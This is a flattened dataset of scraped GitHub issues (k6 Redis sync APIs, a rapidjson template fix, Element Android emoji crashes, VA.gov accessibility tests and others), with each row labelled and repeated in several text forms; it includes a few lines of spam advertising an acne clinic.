Unnamed: 0
int64 0
832k
| id
float64 2.49B
32.1B
| type
stringclasses 1
value | created_at
stringlengths 19
19
| repo
stringlengths 5
112
| repo_url
stringlengths 34
141
| action
stringclasses 3
values | title
stringlengths 1
757
| labels
stringlengths 4
664
| body
stringlengths 3
261k
| index
stringclasses 10
values | text_combine
stringlengths 96
261k
| label
stringclasses 2
values | text
stringlengths 96
232k
| binary_label
int64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
399,741
| 27,253,665,716
|
IssuesEvent
|
2023-02-22 09:57:35
|
grafana/xk6-redis
|
https://api.github.com/repos/grafana/xk6-redis
|
closed
|
Sync APIs
|
documentation
|
#4 brought async support to most of the [xk6-redis APIs](https://github.com/grafana/xk6-redis#api). Currently, `await` is not currently supported, so there is no way to interact with Redis synchronously for most APIs.
```javascript
// await is not supported
const counter = await redisClient.get('my_counter');
if (counter > 10) {
// do something in VU code
}
```
I discussed this briefly with @mstoykov and @sniku. It seems that async APIs does not allow using using Redis for some particular cases.
The main reason is that Promise handlers are always executed after the VU code. Let's show one example:
```js
export default function () {
CONSOLE.log(`before async ${exec.vu.idInTest}`);
redisClient.incr('my_key').then((total) => {
// this will only be executed when the VUs code finalizes
CONSOLE.log(`promise callback ${exec.vu.idInTest}`);
});
sleep(Math.random() * 5);
CONSOLE.log(`exit VU code ${exec.vu.idInTest}`);
}
```
In this case, the execution will always be in this order:
```bash
before async 1
exit VU code 1
promise callback 1
```
With async APIs, the result of a promise cannot change the VU execution code (outside the promise handler). Users could not do something like:
```javascript
let localCounter = 0;
redisClient.get('my_counter').then((counter) => {
localCounter = counter;
});
while (localCounter === 0) {
// VU will be blocked in this loop.
}
```
This issue requests to provide "sync" support for Redis APIs to not limit the potential of using Redis in k6 tests. For example, to share data across VUs in your load test.
cc @oleiade
|
1.0
|
Sync APIs - #4 brought async support to most of the [xk6-redis APIs](https://github.com/grafana/xk6-redis#api). Currently, `await` is not currently supported, so there is no way to interact with Redis synchronously for most APIs.
```javascript
// await is not supported
const counter = await redisClient.get('my_counter');
if (counter > 10) {
// do something in VU code
}
```
I discussed this briefly with @mstoykov and @sniku. It seems that async APIs does not allow using using Redis for some particular cases.
The main reason is that Promise handlers are always executed after the VU code. Let's show one example:
```js
export default function () {
CONSOLE.log(`before async ${exec.vu.idInTest}`);
redisClient.incr('my_key').then((total) => {
// this will only be executed when the VUs code finalizes
CONSOLE.log(`promise callback ${exec.vu.idInTest}`);
});
sleep(Math.random() * 5);
CONSOLE.log(`exit VU code ${exec.vu.idInTest}`);
}
```
In this case, the execution will always be in this order:
```bash
before async 1
exit VU code 1
promise callback 1
```
With async APIs, the result of a promise cannot change the VU execution code (outside the promise handler). Users could not do something like:
```javascript
let localCounter = 0;
redisClient.get('my_counter').then((counter) => {
localCounter = counter;
});
while (localCounter === 0) {
// VU will be blocked in this loop.
}
```
This issue requests to provide "sync" support for Redis APIs to not limit the potential of using Redis in k6 tests. For example, to share data across VUs in your load test.
cc @oleiade
|
non_defect
|
sync apis brought async support to most of the currently await is not currently supported so there is no way to interact with redis synchronously for most apis javascript await is not supported const counter await redisclient get my counter if counter do something in vu code i discussed this briefly with mstoykov and sniku it seems that async apis does not allow using using redis for some particular cases the main reason is that promise handlers are always executed after the vu code let s show one example js export default function console log before async exec vu idintest redisclient incr my key then total this will only be executed when the vus code finalizes console log promise callback exec vu idintest sleep math random console log exit vu code exec vu idintest in this case the execution will always be in this order bash before async exit vu code promise callback with async apis the result of a promise cannot change the vu execution code outside the promise handler users could not do something like javascript let localcounter redisclient get my counter then counter localcounter counter while localcounter vu will be blocked in this loop this issue requests to provide sync support for redis apis to not limit the potential of using redis in tests for example to share data across vus in your load test cc oleiade
| 0
|
13,296
| 2,750,874,964
|
IssuesEvent
|
2015-04-24 03:37:32
|
heradhis/indonesianadblockrules
|
https://api.github.com/repos/heradhis/indonesianadblockrules
|
closed
|
1
|
auto-migrated Priority-Medium Type-Defect
|
```
pada beberapa situs akan terjadi kekosongan area website, tolong bertahu
saya jika terjadi hal tersebut.
```
Original issue reported on code.google.com by `hermawan...@gmail.com` on 17 Apr 2010 at 11:11
|
1.0
|
1 - ```
pada beberapa situs akan terjadi kekosongan area website, tolong bertahu
saya jika terjadi hal tersebut.
```
Original issue reported on code.google.com by `hermawan...@gmail.com` on 17 Apr 2010 at 11:11
|
defect
|
pada beberapa situs akan terjadi kekosongan area website tolong bertahu saya jika terjadi hal tersebut original issue reported on code google com by hermawan gmail com on apr at
| 1
|
3,891
| 2,610,083,536
|
IssuesEvent
|
2015-02-26 18:25:30
|
chrsmith/dsdsdaadf
|
https://api.github.com/repos/chrsmith/dsdsdaadf
|
opened
|
深圳白头粉刺的祛除
|
auto-migrated Priority-Medium Type-Defect
|
```
深圳白头粉刺的祛除【深圳韩方科颜全国热线400-869-1818,24小
时QQ4008691818】深圳韩方科颜专业祛痘连锁机构,机构以韩国��
�方——韩方科颜这一国妆准字号治疗型权威,祛痘佳品,韩�
��科颜专业祛痘连锁机构,采用韩国秘方配合专业“不反弹”
健康祛痘技术并结合先进“先进豪华彩光”仪,开创国内专��
�治疗粉刺、痤疮签约包治先河,成功消除了许多顾客脸上的�
��痘。
```
-----
Original issue reported on code.google.com by `szft...@163.com` on 14 May 2014 at 6:50
|
1.0
|
深圳白头粉刺的祛除 - ```
深圳白头粉刺的祛除【深圳韩方科颜全国热线400-869-1818,24小
时QQ4008691818】深圳韩方科颜专业祛痘连锁机构,机构以韩国��
�方——韩方科颜这一国妆准字号治疗型权威,祛痘佳品,韩�
��科颜专业祛痘连锁机构,采用韩国秘方配合专业“不反弹”
健康祛痘技术并结合先进“先进豪华彩光”仪,开创国内专��
�治疗粉刺、痤疮签约包治先河,成功消除了许多顾客脸上的�
��痘。
```
-----
Original issue reported on code.google.com by `szft...@163.com` on 14 May 2014 at 6:50
|
defect
|
深圳白头粉刺的祛除 深圳白头粉刺的祛除【 , 】深圳韩方科颜专业祛痘连锁机构,机构以韩国�� �方——韩方科颜这一国妆准字号治疗型权威,祛痘佳品,韩� ��科颜专业祛痘连锁机构,采用韩国秘方配合专业“不反弹” 健康祛痘技术并结合先进“先进豪华彩光”仪,开创国内专�� �治疗粉刺、痤疮签约包治先河,成功消除了许多顾客脸上的� ��痘。 original issue reported on code google com by szft com on may at
| 1
|
66,433
| 20,196,564,945
|
IssuesEvent
|
2022-02-11 11:12:25
|
vector-im/element-ios
|
https://api.github.com/repos/vector-im/element-ios
|
opened
|
Message bubbles: horizontal black lines between messages (sometimes)
|
T-Defect
|
### Steps to reproduce
1. Check any room to which different people send messages to.
### Outcome
#### What did you expect?
#### What happened instead?
Sometimes you can see black horizontal lines spanning across the whole width in between messages of different people but not between two messages of the same person. See attached screenshot:

### Your phone model
iPhone 8
### Operating system version
iOS 15.3
### Application version
Element 1.8.0
### Homeserver
Synapse 1.52.0
### Will you send logs?
No
|
1.0
|
Message bubbles: horizontal black lines between messages (sometimes) - ### Steps to reproduce
1. Check any room to which different people send messages to.
### Outcome
#### What did you expect?
#### What happened instead?
Sometimes you can see black horizontal lines spanning across the whole width in between messages of different people but not between two messages of the same person. See attached screenshot:

### Your phone model
iPhone 8
### Operating system version
iOS 15.3
### Application version
Element 1.8.0
### Homeserver
Synapse 1.52.0
### Will you send logs?
No
|
defect
|
message bubbles horizontal black lines between messages sometimes steps to reproduce check any room to which different people send messages to outcome what did you expect what happened instead sometimes you can see black horizontal lines spanning across the whole width in between messages of different people but not between two messages of the same person see attached screenshot your phone model iphone operating system version ios application version element homeserver synapse will you send logs no
| 1
|
10,502
| 2,622,168,592
|
IssuesEvent
|
2015-03-04 00:13:29
|
byzhang/rapidjson
|
https://api.github.com/repos/byzhang/rapidjson
|
closed
|
fix, dependent names inside templates needs to be qualified.
|
auto-migrated Priority-Medium Type-Defect
|
```
Hi, thanks for a great package. I have a suggested fix below. Please have a
look.
What steps will reproduce the problem?
1. Compile with clang 3.1
What version of the product are you using? On what operating system?
rapidjason 0.1 (the problem is the same in svn trunk)
Linux, ubuntu 10.12
Please provide any additional information below.
In the file include/rapidjson/document.h
The ParseStream method (around line 704) seems to use ill-defined C++ which
slips through gcc. In my understanding is that clang is right to reject this.
The issue is that dependent names need template qualification inside templates.
To me clang is right to demand that the meaning of these names be more clearly
specified. I suggest to change:
reader.Parse<parseFlags> into
reader. template Parse<parseFlags>
and
this->RawAssign into
RawAssign
This builds correctly both with gcc (4.4) and clang (3.1)
Here's the complete method with those fixes:
template <unsigned parseFlags, typename Stream>
GenericDocument& ParseStream(Stream& stream) {
ValueType::SetNull(); // Remove existing root if exist
GenericReader<Encoding> reader;
if (reader. template Parse<parseFlags>(stream, *this)) {
RAPIDJSON_ASSERT(stack_.GetSize() == sizeof(ValueType)); // Got one and only one root object
this->RawAssign(*stack_.template Pop<ValueType>(1));
parseError_ = 0;
errorOffset_ = 0;
}
else {
parseError_ = reader.GetParseError();
errorOffset_ = reader.GetErrorOffset();
ClearStack();
}
return *this;
}
Full compilation error below
----------------------------
dlinux_sdk_896419-80/rapidjson/rapidjson-0.1/rapidjson/include/rapidjson/documen
t.h:708:7: error: reference to non-static member function must be called
if (reader.Parse<parseFlags>(stream, *this)) {
^~~~~~~~~~~~
dlinux_sdk_896419-80/rapidjson/rapidjson-0.1/rapidjson/include/rapidjson/documen
t.h:741:10: note: in instantiation of function template specialization
'rapidjson::GenericDocument<rapidjson::UTF8<char>, rapidjson::MemoryPoolAllocator<rapidjson::CrtAllocator> >::ParseStream<0,
rapidjson::GenericStringStream<rapidjson::UTF8<char> > >' requested here
return ParseStream<parseFlags>(s);
^
x.cpp:78:6: note: in instantiation of function template specialization
'rapidjson::GenericDocument<rapidjson::UTF8<char>,
rapidjson::MemoryPoolAllocator<rapidjson::CrtAllocator> >::Parse<0>' requested here
doc.Parse<0>(cfg);
^
In file included from y.h:4:
dlinux_sdk_896419-80/rapidjson/rapidjson-0.1/rapidjson/include/rapidjson/documen
t.h:708:19: error: invalid operands to binary expression
('<bound member function type>' and 'unsigned int')
if (reader.Parse<parseFlags>(stream, *this)) {
~~~~~~~~~~~~^~~~~~~~~~~
2 errors generated.
```
Original issue reported on code.google.com by `lundb...@gmail.com` on 18 Oct 2012 at 1:35
* Merged into: #13
|
1.0
|
fix, dependent names inside templates needs to be qualified. - ```
Hi, thanks for a great package. I have a suggested fix below. Please have a
look.
What steps will reproduce the problem?
1. Compile with clang 3.1
What version of the product are you using? On what operating system?
rapidjason 0.1 (the problem is the same in svn trunk)
Linux, ubuntu 10.12
Please provide any additional information below.
In the file include/rapidjson/document.h
The ParseStream method (around line 704) seems to use ill-defined C++ which
slips through gcc. In my understanding is that clang is right to reject this.
The issue is that dependent names need template qualification inside templates.
To me clang is right to demand that the meaning of these names be more clearly
specified. I suggest to change:
reader.Parse<parseFlags> into
reader. template Parse<parseFlags>
and
this->RawAssign into
RawAssign
This builds correctly both with gcc (4.4) and clang (3.1)
Here's the complete method with those fixes:
template <unsigned parseFlags, typename Stream>
GenericDocument& ParseStream(Stream& stream) {
ValueType::SetNull(); // Remove existing root if exist
GenericReader<Encoding> reader;
if (reader. template Parse<parseFlags>(stream, *this)) {
RAPIDJSON_ASSERT(stack_.GetSize() == sizeof(ValueType)); // Got one and only one root object
this->RawAssign(*stack_.template Pop<ValueType>(1));
parseError_ = 0;
errorOffset_ = 0;
}
else {
parseError_ = reader.GetParseError();
errorOffset_ = reader.GetErrorOffset();
ClearStack();
}
return *this;
}
Full compilation error below
----------------------------
dlinux_sdk_896419-80/rapidjson/rapidjson-0.1/rapidjson/include/rapidjson/documen
t.h:708:7: error: reference to non-static member function must be called
if (reader.Parse<parseFlags>(stream, *this)) {
^~~~~~~~~~~~
dlinux_sdk_896419-80/rapidjson/rapidjson-0.1/rapidjson/include/rapidjson/documen
t.h:741:10: note: in instantiation of function template specialization
'rapidjson::GenericDocument<rapidjson::UTF8<char>, rapidjson::MemoryPoolAllocator<rapidjson::CrtAllocator> >::ParseStream<0,
rapidjson::GenericStringStream<rapidjson::UTF8<char> > >' requested here
return ParseStream<parseFlags>(s);
^
x.cpp:78:6: note: in instantiation of function template specialization
'rapidjson::GenericDocument<rapidjson::UTF8<char>,
rapidjson::MemoryPoolAllocator<rapidjson::CrtAllocator> >::Parse<0>' requested here
doc.Parse<0>(cfg);
^
In file included from y.h:4:
dlinux_sdk_896419-80/rapidjson/rapidjson-0.1/rapidjson/include/rapidjson/documen
t.h:708:19: error: invalid operands to binary expression
('<bound member function type>' and 'unsigned int')
if (reader.Parse<parseFlags>(stream, *this)) {
~~~~~~~~~~~~^~~~~~~~~~~
2 errors generated.
```
Original issue reported on code.google.com by `lundb...@gmail.com` on 18 Oct 2012 at 1:35
* Merged into: #13
|
defect
|
fix dependent names inside templates needs to be qualified hi thanks for a great package i have a suggested fix below please have a look what steps will reproduce the problem compile with clang what version of the product are you using on what operating system rapidjason the problem is the same in svn trunk linux ubuntu please provide any additional information below in the file include rapidjson document h the parsestream method around line seems to use ill defined c which slips through gcc in my understanding is that clang is right to reject this the issue is that dependent names need template qualification inside templates to me clang is right to demand that the meaning of these names be more clearly specified i suggest to change reader parse into reader template parse and this rawassign into rawassign this builds correctly both with gcc and clang here s the complete method with those fixes template genericdocument parsestream stream stream valuetype setnull remove existing root if exist genericreader reader if reader template parse stream this rapidjson assert stack getsize sizeof valuetype got one and only one root object this rawassign stack template pop parseerror erroroffset else parseerror reader getparseerror erroroffset reader geterroroffset clearstack return this full compilation error below dlinux sdk rapidjson rapidjson rapidjson include rapidjson documen t h error reference to non static member function must be called if reader parse stream this dlinux sdk rapidjson rapidjson rapidjson include rapidjson documen t h note in instantiation of function template specialization rapidjson genericdocument rapidjson memorypoolallocator parsestream rapidjson genericstringstream requested here return parsestream s x cpp note in instantiation of function template specialization rapidjson genericdocument rapidjson memorypoolallocator parse requested here doc parse cfg in file included from y h dlinux sdk rapidjson rapidjson rapidjson include rapidjson documen t h error invalid operands to binary expression and unsigned int if reader parse stream this errors generated original issue reported on code google com by lundb gmail com on oct at merged into
| 1
|
266,515
| 23,243,588,694
|
IssuesEvent
|
2022-08-03 17:50:17
|
microsoft/vscode-python
|
https://api.github.com/repos/microsoft/vscode-python
|
closed
|
Display names of parameterized tests in test explorer
|
feature-request area-testing needs proposal
|
Assume we have a pamraterized test `test_adding_numbers(a, b)`.
We have parameters `[1,2], [2,4], [4,9]`
The UI will display the nodes as follows:
<img width="405" alt="Screen Shot 2019-03-14 at 4 35 31 PM" src="https://user-images.githubusercontent.com/1948812/54398438-3ffb5800-4677-11e9-8aaa-2c3a4aa0c29b.png">
Personally I believe it needs to be altered to display just the parameters in the child nodes.
I.e. why repeat the function name in the child nodes, we're testing different parameters and as a user that's what I would like to see.
Here's the improved version:
<img width="460" alt="Screen Shot 2019-03-14 at 4 39 53 PM" src="https://user-images.githubusercontent.com/1948812/54398569-d3cd2400-4677-11e9-8b4d-d458746e66f3.png">
/cc @luabud
More examples of before and after with a larger test base (`pytest` repo):
<img width="464" alt="Screen Shot 2019-03-14 at 4 44 49 PM" src="https://user-images.githubusercontent.com/1948812/54398731-843b2800-4678-11e9-86bd-73c2781fb12d.png">
<img width="397" alt="Screen Shot 2019-03-14 at 4 43 07 PM" src="https://user-images.githubusercontent.com/1948812/54398737-88674580-4678-11e9-8ca3-53b8c77e17cc.png">
<img width="493" alt="Screen Shot 2019-03-14 at 4 42 58 PM" src="https://user-images.githubusercontent.com/1948812/54398742-90bf8080-4678-11e9-8e35-219bea4e5eb2.png">
|
1.0
|
Display names of parameterized tests in test explorer - Assume we have a pamraterized test `test_adding_numbers(a, b)`.
We have parameters `[1,2], [2,4], [4,9]`
The UI will display the nodes as follows:
<img width="405" alt="Screen Shot 2019-03-14 at 4 35 31 PM" src="https://user-images.githubusercontent.com/1948812/54398438-3ffb5800-4677-11e9-8aaa-2c3a4aa0c29b.png">
Personally I believe it needs to be altered to display just the parameters in the child nodes.
I.e. why repeat the function name in the child nodes, we're testing different parameters and as a user that's what I would like to see.
Here's the improved version:
<img width="460" alt="Screen Shot 2019-03-14 at 4 39 53 PM" src="https://user-images.githubusercontent.com/1948812/54398569-d3cd2400-4677-11e9-8b4d-d458746e66f3.png">
/cc @luabud
More examples of before and after with a larger test base (`pytest` repo):
<img width="464" alt="Screen Shot 2019-03-14 at 4 44 49 PM" src="https://user-images.githubusercontent.com/1948812/54398731-843b2800-4678-11e9-86bd-73c2781fb12d.png">
<img width="397" alt="Screen Shot 2019-03-14 at 4 43 07 PM" src="https://user-images.githubusercontent.com/1948812/54398737-88674580-4678-11e9-8ca3-53b8c77e17cc.png">
<img width="493" alt="Screen Shot 2019-03-14 at 4 42 58 PM" src="https://user-images.githubusercontent.com/1948812/54398742-90bf8080-4678-11e9-8e35-219bea4e5eb2.png">
|
non_defect
|
display names of parameterized tests in test explorer assume we have a pamraterized test test adding numbers a b we have parameters the ui will display the nodes as follows img width alt screen shot at pm src personally i believe it needs to be altered to display just the parameters in the child nodes i e why repeat the function name in the child nodes we re testing different parameters and as a user that s what i would like to see here s the improved version img width alt screen shot at pm src cc luabud more examples of before and after with a larger test base pytest repo img width alt screen shot at pm src img width alt screen shot at pm src img width alt screen shot at pm src
| 0
|
56,691
| 15,300,358,924
|
IssuesEvent
|
2021-02-24 12:12:29
|
radon-h2020/radon-defect-prediction-plugin
|
https://api.github.com/repos/radon-h2020/radon-defect-prediction-plugin
|
closed
|
R-T3.4-8: The defect-prediction tool must provide filters to decide which predefined defects to find
|
Defect prediction IDE MUST WP3
|
ID | R-T3.4-8
-- | --
Section | WP3: Methodology and Quality Assurance Requirements
Type | USABILITY
User Story | As an Operations Engineer I want to be able to find for specific defects
Requirement | The defect-prediction tool must provide filters to decide which predefined defects to find
Extended Description | The user should be able to filter which predefined defects are to be found
Priority | Must have
Affected Tools | DEFECT_PRED_TOOL
Means of Verification | Direct implementation on IDE, feature checklist, case-study
Dependency | R-T3.4-1 https://github.com/radon-h2020/radon-defect-prediction-api/issues/2 (could use) <br> R-T3.4-2 https://github.com/radon-h2020/radon-defect-prediction-api/issues/4 (could use) <br> R-T3.4-3 https://github.com/radon-h2020/radon-defect-prediction-api/issues/3 (could use)
|
1.0
|
R-T3.4-8: The defect-prediction tool must provide filters to decide which predefined defects to find - ID | R-T3.4-8
-- | --
Section | WP3: Methodology and Quality Assurance Requirements
Type | USABILITY
User Story | As an Operations Engineer I want to be able to find for specific defects
Requirement | The defect-prediction tool must provide filters to decide which predefined defects to find
Extended Description | The user should be able to filter which predefined defects are to be found
Priority | Must have
Affected Tools | DEFECT_PRED_TOOL
Means of Verification | Direct implementation on IDE, feature checklist, case-study
Dependency | R-T3.4-1 https://github.com/radon-h2020/radon-defect-prediction-api/issues/2 (could use) <br> R-T3.4-2 https://github.com/radon-h2020/radon-defect-prediction-api/issues/4 (could use) <br> R-T3.4-3 https://github.com/radon-h2020/radon-defect-prediction-api/issues/3 (could use)
|
defect
|
r the defect prediction tool must provide filters to decide which predefined defects to find id r section methodology and quality assurance requirements type usability user story as an operations engineer i want to be able to find for specific defects requirement the defect prediction tool must provide filters to decide which predefined defects to find extended description the user should be able to filter which predefined defects are to be found priority must have affected tools defect pred tool means of verification direct implementation on ide feature checklist case study dependency r could use r could use r could use
| 1
|
65,342
| 19,412,062,741
|
IssuesEvent
|
2021-12-20 10:41:19
|
vector-im/element-android
|
https://api.github.com/repos/vector-im/element-android
|
closed
|
Emojis still crashing on Android versions below 9.0 / P / API 28
|
T-Defect Z-Crash A-Timeline S-Critical O-Occasional
|
### Steps to reproduce
1. On a device running android 8.1.1 or below, with play services enabled
2. Open a room with the :face_exhaling: emoji
### Outcome
#### What did you expect?
No crash
#### What happened instead?
We're still seeing #4691 however it's limited to android versions below 9.0 / P / API 28
```
Thread: main, Exception: java.lang.IllegalArgumentException: MetricAffectingSpan can not be set to PrecomputedText.
at androidx.core.text.PrecomputedTextCompat.setSpan(PrecomputedTextCompat.java:5)
at androidx.emoji2.text.EmojiCompat$CompatInternal19.process(EmojiCompat.java:51)
at androidx.emoji2.text.EmojiCompat.process(EmojiCompat.java:12)
at androidx.emoji2.viewsintegration.EmojiInputFilter.filter(EmojiInputFilter.java:8)
at android.widget.TextView.setText(TextView.java:4996)
at android.widget.TextView.setText(TextView.java:4962)
at android.widget.TextView.setText(TextView.java:4937)
at androidx.core.widget.TextViewCompat.setPrecomputedText(TextViewCompat.java:8)
```
### Your phone model
_No response_
### Operating system version
_No response_
### Application version and app store
_No response_
### Homeserver
N/A
### Will you send logs?
No
|
1.0
|
Emojis still crashing on Android versions below 9.0 / P / API 28 - ### Steps to reproduce
1. On a device running android 8.1.1 or below, with play services enabled
2. Open a room with the :face_exhaling: emoji
### Outcome
#### What did you expect?
No crash
#### What happened instead?
We're still seeing #4691 however it's limited to android versions below 9.0 / P / API 28
```
Thread: main, Exception: java.lang.IllegalArgumentException: MetricAffectingSpan can not be set to PrecomputedText.
at androidx.core.text.PrecomputedTextCompat.setSpan(PrecomputedTextCompat.java:5)
at androidx.emoji2.text.EmojiCompat$CompatInternal19.process(EmojiCompat.java:51)
at androidx.emoji2.text.EmojiCompat.process(EmojiCompat.java:12)
at androidx.emoji2.viewsintegration.EmojiInputFilter.filter(EmojiInputFilter.java:8)
at android.widget.TextView.setText(TextView.java:4996)
at android.widget.TextView.setText(TextView.java:4962)
at android.widget.TextView.setText(TextView.java:4937)
at androidx.core.widget.TextViewCompat.setPrecomputedText(TextViewCompat.java:8)
```
### Your phone model
_No response_
### Operating system version
_No response_
### Application version and app store
_No response_
### Homeserver
N/A
### Will you send logs?
No
|
defect
|
emojis still crashing on android versions below p api steps to reproduce on a device running android or below with play services enabled open a room with the face exhaling emoji outcome what did you expect no crash what happened instead we re still seeing however it s limited to android versions below p api thread main exception java lang illegalargumentexception metricaffectingspan can not be set to precomputedtext at androidx core text precomputedtextcompat setspan precomputedtextcompat java at androidx text emojicompat process emojicompat java at androidx text emojicompat process emojicompat java at androidx viewsintegration emojiinputfilter filter emojiinputfilter java at android widget textview settext textview java at android widget textview settext textview java at android widget textview settext textview java at androidx core widget textviewcompat setprecomputedtext textviewcompat java your phone model no response operating system version no response application version and app store no response homeserver n a will you send logs no
| 1
|
46,863
| 13,055,991,454
|
IssuesEvent
|
2020-07-30 03:19:38
|
icecube-trac/tix2
|
https://api.github.com/repos/icecube-trac/tix2
|
opened
|
[docs] switch to python-based documentation builder (Trac #2025)
|
Incomplete Migration Migrated from Trac analysis defect
|
Migrated from https://code.icecube.wisc.edu/ticket/2025
```json
{
"status": "closed",
"changetime": "2019-02-13T14:13:57",
"description": "speed up documentation build by switching to python-based doc builder `docs-build`. Use the `-jN` option on multicore systems. this is in its own project which was added to combo \nhttp://code.icecube.wisc.edu/icetray/projects/docs/trunk",
"reporter": "kjmeagher",
"cc": "",
"resolution": "fixed",
"_ts": "1550067237750774",
"component": "analysis",
"summary": "[docs] switch to python-based documentation builder",
"priority": "normal",
"keywords": "",
"time": "2017-05-18T07:11:18",
"milestone": "",
"owner": "nega",
"type": "defect"
}
```
|
1.0
|
[docs] switch to python-based documentation builder (Trac #2025) - Migrated from https://code.icecube.wisc.edu/ticket/2025
```json
{
"status": "closed",
"changetime": "2019-02-13T14:13:57",
"description": "speed up documentation build by switching to python-based doc builder `docs-build`. Use the `-jN` option on multicore systems. this is in its own project which was added to combo \nhttp://code.icecube.wisc.edu/icetray/projects/docs/trunk",
"reporter": "kjmeagher",
"cc": "",
"resolution": "fixed",
"_ts": "1550067237750774",
"component": "analysis",
"summary": "[docs] switch to python-based documentation builder",
"priority": "normal",
"keywords": "",
"time": "2017-05-18T07:11:18",
"milestone": "",
"owner": "nega",
"type": "defect"
}
```
|
defect
|
switch to python based documentation builder trac migrated from json status closed changetime description speed up documentation build by switching to python based doc builder docs build use the jn option on multicore systems this is in its own project which was added to combo n reporter kjmeagher cc resolution fixed ts component analysis summary switch to python based documentation builder priority normal keywords time milestone owner nega type defect
| 1
|
44,015
| 11,903,717,227
|
IssuesEvent
|
2020-03-30 15:44:23
|
department-of-veterans-affairs/va.gov-team
|
https://api.github.com/repos/department-of-veterans-affairs/va.gov-team
|
opened
|
[CI/CD]: Review coverage of accessibility checks in pre-need end-to-end tests
|
508-defect-3 508/Accessibility testing
|
**Feedback framework**
- **❗️ Must** for if the feedback must be applied
- **⚠️Should** if the feedback is best practice
- **✔️ Consider** for suggestions/enhancements
## Description
Applications **must** have thorough end-to-end tests that run in our continuous integration/continuous deployment (CI/CD) pipeline. While reviewing the `/pre-need` application, I noticed we should open one accordion on the review page before running our axe check. I'd like the front-end engineering team to review and update this test for better coverage. Definition of done in acceptance criteria below.
## Point of Contact
<!-- If this issue is being opened by a VFS team member, please add a point of contact. Usually this is the same person who enters the issue ticket.
-->
**VFS Point of Contact:** _Jennifer_
## Environment
* `vets-website/src/applications/pre-need/tests`
* `$ yarn test:e2e src/applications/pre-need/tests`
## Acceptance Criteria
<!-- As a keyboard user, I want to open the Level of Coverage widget by pressing Spacebar or pressing Enter. These keypress actions should not interfere with the mouse click event also opening the widget. -->
**Definition of done:**
- [ ] Front-end team member(s) have reviewed end-to-end tests for axe checks
- [ ] Ensure one accordion is open on the review page before running an axe check
- [ ] FE team has consulted with accessibility specialist in cases where there are high numbers of modals, accordions, other hidden content that could slow down e2e test runs.
- [ ] No axe `violations` appear in the plugin console. These will break the CI/CD build.
## WCAG or Vendor Guidance (optional)
* [Custom axeCheck helper method](https://github.com/department-of-veterans-affairs/vets-website/blob/master/src/platform/testing/e2e/nightwatch-commands/axeCheck.js)
* [VSP guidance on writing end-to-end tests](https://github.com/department-of-veterans-affairs/va.gov-team/tree/master/platform/quality-assurance/e2e-testing)
|
1.0
|
[CI/CD]: Review coverage of accessibility checks in pre-need end-to-end tests - **Feedback framework**
- **❗️ Must** for if the feedback must be applied
- **⚠️Should** if the feedback is best practice
- **✔️ Consider** for suggestions/enhancements
## Description
Applications **must** have thorough end-to-end tests that run in our continuous integration/continuous deployment (CI/CD) pipeline. While reviewing the `/pre-need` application, I noticed we should open one accordion on the review page before running our axe check. I'd like the front-end engineering team to review and update this test for better coverage. Definition of done in acceptance criteria below.
## Point of Contact
<!-- If this issue is being opened by a VFS team member, please add a point of contact. Usually this is the same person who enters the issue ticket.
-->
**VFS Point of Contact:** _Jennifer_
## Environment
* `vets-website/src/applications/pre-need/tests`
* `$ yarn test:e2e src/applications/pre-need/tests`
## Acceptance Criteria
<!-- As a keyboard user, I want to open the Level of Coverage widget by pressing Spacebar or pressing Enter. These keypress actions should not interfere with the mouse click event also opening the widget. -->
**Definition of done:**
- [ ] Front-end team member(s) have reviewed end-to-end tests for axe checks
- [ ] Ensure one accordion is open on the review page before running an axe check
- [ ] FE team has consulted with accessibility specialist in cases where there are high numbers of modals, accordions, other hidden content that could slow down e2e test runs.
- [ ] No axe `violations` appear in the plugin console. These will break the CI/CD build.
## WCAG or Vendor Guidance (optional)
* [Custom axeCheck helper method](https://github.com/department-of-veterans-affairs/vets-website/blob/master/src/platform/testing/e2e/nightwatch-commands/axeCheck.js)
* [VSP guidance on writing end-to-end tests](https://github.com/department-of-veterans-affairs/va.gov-team/tree/master/platform/quality-assurance/e2e-testing)
|
defect
|
review coverage of accessibility checks in pre need end to end tests feedback framework ❗️ must for if the feedback must be applied ⚠️should if the feedback is best practice ✔️ consider for suggestions enhancements description applications must have thorough end to end tests that run in our continuous integration continuous deployment ci cd pipeline while reviewing the pre need application i noticed we should open one accordion on the review page before running our axe check i d like the front end engineering team to review and update this test for better coverage definition of done in acceptance criteria below point of contact if this issue is being opened by a vfs team member please add a point of contact usually this is the same person who enters the issue ticket vfs point of contact jennifer environment vets website src applications pre need tests yarn test src applications pre need tests acceptance criteria definition of done front end team member s have reviewed end to end tests for axe checks ensure one accordion is open on the review page before running an axe check fe team has consulted with accessibility specialist in cases where there are high numbers of modals accordions other hidden content that could slow down test runs no axe violations appear in the plugin console these will break the ci cd build wcag or vendor guidance optional
| 1
|
178,926
| 6,620,215,363
|
IssuesEvent
|
2017-09-21 14:52:06
|
spring-projects/spring-boot
|
https://api.github.com/repos/spring-projects/spring-boot
|
closed
|
Add a generic to `DataSourceBuilder`
|
priority: normal theme: datasource type: enhancement
|
To be able to derive the actual type of the `DataSource` rather than a raw `DataSource`.
|
1.0
|
Add a generic to `DataSourceBuilder` - To be able to derive the actual type of the `DataSource` rather than a raw `DataSource`.
|
non_defect
|
add a generic to datasourcebuilder to be able to derive the actual type of the datasource rather than a raw datasource
| 0
|
4,341
| 2,610,091,950
|
IssuesEvent
|
2015-02-26 18:27:47
|
chrsmith/dsdsdaadf
|
https://api.github.com/repos/chrsmith/dsdsdaadf
|
opened
|
深圳粉刺如何祛除
|
auto-migrated Priority-Medium Type-Defect
|
```
深圳粉刺如何祛除【深圳韩方科颜全国热线400-869-1818,24小时
QQ4008691818】深圳韩方科颜专业祛痘连锁机构,机构以韩国秘��
�——韩方科颜这一国妆准字号治疗型权威,祛痘佳品,韩方�
��颜专业祛痘连锁机构,采用韩国秘方配合专业“不反弹”健
康祛痘技术并结合先进“先进豪华彩光”仪,开创国内专业��
�疗粉刺、痤疮签约包治先河,成功消除了许多顾客脸上的痘�
��。
```
-----
Original issue reported on code.google.com by `szft...@163.com` on 14 May 2014 at 7:53
|
1.0
|
深圳粉刺如何祛除 - ```
深圳粉刺如何祛除【深圳韩方科颜全国热线400-869-1818,24小时
QQ4008691818】深圳韩方科颜专业祛痘连锁机构,机构以韩国秘��
�——韩方科颜这一国妆准字号治疗型权威,祛痘佳品,韩方�
��颜专业祛痘连锁机构,采用韩国秘方配合专业“不反弹”健
康祛痘技术并结合先进“先进豪华彩光”仪,开创国内专业��
